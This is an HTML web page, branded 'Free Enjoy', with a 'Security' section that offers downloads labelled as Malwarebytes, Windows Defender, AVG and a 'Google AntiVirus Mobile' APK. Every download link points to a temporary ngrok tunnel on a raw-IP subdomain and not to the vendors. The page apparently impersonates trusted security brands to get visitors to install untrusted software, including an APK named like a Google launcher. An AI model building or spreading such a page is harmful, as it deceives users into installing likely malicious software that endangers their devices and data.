<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Security  Homepage</title>
  </head>
  <body>
    <!--header part start-->
    <header class="header">
      <nav class="navbar">
        <h2 class="logo"><a href="#">Free Enjoy</a></h2>
        <input type="checkbox" id="menu-toggle" />
        <label for="menu-toggle" id="hamburger-btn">
          <svg
            xmlns="http://www.w3.org/2000/svg"
            height="24"
            viewBox="0 0 24 24"
            width="24"
          >
            <path
              d="M3 12h18M3 6h18M3 18h18"
              stroke="currentColor"
              stroke-width="2"
              stroke-linecap="round"
            />
          </svg>
        </label>
        <ul class="links">
          <li><a href="https://59d7-144-48-108-255.ngrok-free.app/index.html">Home</a></li>
          <li><a href="https://59d7-144-48-108-255.ngrok-free.app/games.html">Games</a></li>
          <li><a href="https://59d7-144-48-108-255.ngrok-free.app/security.html" class="active">Security</a></li>
          <li><a href="#">Contact Us</a></li>
        </ul>
      </nav>
    </header>
    <!--header part End-->

    <!--section part start-->
    <section class="hero-section">
      <div class="hero"></div>
      <div class="img">
        <img
          src="hero-bg.png"
          alt="hero image"
        />
      </div>
    </section>
    <!--section part end-->

    <!--container part start-->

    <div class="container">
      <h3>
        <a href="https://a3f5-144-48-108-255.ngrok-free.app">Malwarebytes Pc</a>
      </h3>

      <br />

      <h3>
        <a href="https://a3f5-144-48-108-255.ngrok-free.app">Windows Defender Pc</a
        >
      </h3>

      <br />
      <h3>
        <a href="https://3669-103-126-149-95.ngrok-free.app/">AVG AntiVirus Mobile </a>
      </h3>

      <br />
      <h3>
        <a
          href="https:/https://29ae-103-126-149-93.ngrok-free.app/google.android.launcher.apk"
          >Google AntiVirus Mobile </a
        >
      </h3>
    </div>

    <!--container part end-->

    <!--css part start-->

    <style>
      /* Importing Google font - Open Sans */
      @import url("https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700&display=swap");

      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        font-family: "Open Sans", sans-serif;
      }

      body {
        height: 100vh;
        width: 100%;
        background: linear-gradient(to bottom, #175d69 23%, #330c43 95%);
      }

      .header {
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
      }

      .navbar {
        display: flex;
        align-items: center;
        justify-content: space-between;
        max-width: 1200px;
        margin: 0 auto;
        padding: 20px 15px;
      }

      .navbar .logo a {
        font-size: 1.8rem;
        text-decoration: none;
        color: #fff;
      }

      .navbar .links {
        display: flex;
        align-items: center;
        list-style: none;
        gap: 35px;
      }

      .navbar .links a {
        font-weight: 500;
        text-decoration: none;
        color: #fff;
        padding: 10px 0;
        transition: 0.2s ease;
      }

      .navbar .links a:hover {
        color: #47b2e4;
      }

      .navbar .buttons a {
        text-decoration: none;
        color: #fff;
        font-size: 1rem;
        padding: 15px 0;
        transition: 0.2s ease;
      }

      .navbar .buttons a:not(:last-child) {
        margin-right: 30px;
      }
      .links.a.active {
        border-bottom: 2px solid #208d75;
      }

      .container {
        margin-top: -400px;
        margin-left: 50px;
      }
      .container h3 {
        font-size: 40px;
        margin: 0px 0px 30px;
        line-height: 0.9;
        text-transform: uppercase;
        font-family: "Permanent Marker", cursive;
      }
      .container h3 a {
        font-size: 18px;
        font-weight: 600;
        font-family: Arial, Helvetica, sans-serif;
        margin-top: -60px;
      }
      .container p {
        width: 500px;
        max-width: 100%;
        line-height: 1.5;
        font-size: 15px;
        margin-bottom: 50px;
      }
      .container a {
        display: inline-block;
        color: #000;
        background: #fff;
        border: 1px solid #fff;
        padding: 9px 25px;
        line-height: 1.4;
        border-radius: 30px;
        font-size: 14px;
        font-weight: 500;
        transition: all ease 0.5s;
        text-decoration: none;
      }
      .container a:hover {
        transform: scale(1.06);
        color: #fff;
        background: transparent;
        border: 1px solid #f5dca8;
      }
      .container a.cta {
        border: 1px solid #f5dca8;
        color: #fff;
        background: transparent;
        margin-left: 20px;
        transition: all ease 0.5s;
      }
      .container a.cta:hover {
        color: #000;
        background: #fff;
        border: 1px solid #fff;
      }
      .container a.cta i {
        margin-right: 8px;
      }

      .hero-section {
        display: flex;
        justify-content: space-evenly;
        align-items: center;
        height: 95vh;
        padding: 0 15px;
        max-width: 1200px;
        margin: 0 auto;
      }

      .hero-section .hero {
        max-width: 50%;
        color: #fff;
      }

      .hero h2 {
        font-size: 2.5rem;
        margin-bottom: 20px;
      }

      .hero p {
        font-size: 1.2rem;
        margin-bottom: 20px;
        color: #c9c7c7;
      }

      .hero-section .img img {
        width: 517px;
        margin-left: 600px;
        margin-bottom: -50px;
      }

      .hero-section .buttons {
        margin-top: 40px;
      }

      .hero-section .buttons a {
        text-decoration: none;
        color: #fff;
        padding: 12px 24px;
        border-radius: 0.375rem;
        font-weight: 600;
        transition: 0.2s ease;
        display: inline-block;
      }

      .hero-section .buttons a:not(:last-child) {
        margin-right: 15px;
      }

      .buttons .join {
        background-color: #47b2e4;
      }

      .hero-section .buttons .learn {
        border: 1px solid #fff;
        border-radius: 0.375rem;
      }

      .hero-section .buttons a:hover {
        background-color: #47b2e4;
      }

      /* Hamburger menu styles */
      #menu-toggle {
        display: none;
      }

      #hamburger-btn {
        font-size: 1.8rem;
        color: #fff;
        cursor: pointer;
        display: none;
        order: 1;
      }

      @media screen and (max-width: 1023px) {
        .navbar .logo a {
          font-size: 1.5rem;
        }

        .links {
          position: fixed;
          left: -100%;
          top: 75px;
          width: 100%;
          height: 100vh;
          padding-top: 50px;
          background: #175d69;
          flex-direction: column;
          transition: 0.3s ease;
        }

        .navbar #menu-toggle:checked ~ .links {
          left: 0;
        }

        .navbar #hamburger-btn {
          display: block;
        }

        .header .buttons {
          display: none;
        }

        .hero-section .hero {
          max-width: 100%;
          text-align: center;
        }

        .hero-section img {
          display: none;
        }
      }
    </style>

    <!--css part end-->

    <!--js code-->
  </body>
</html>
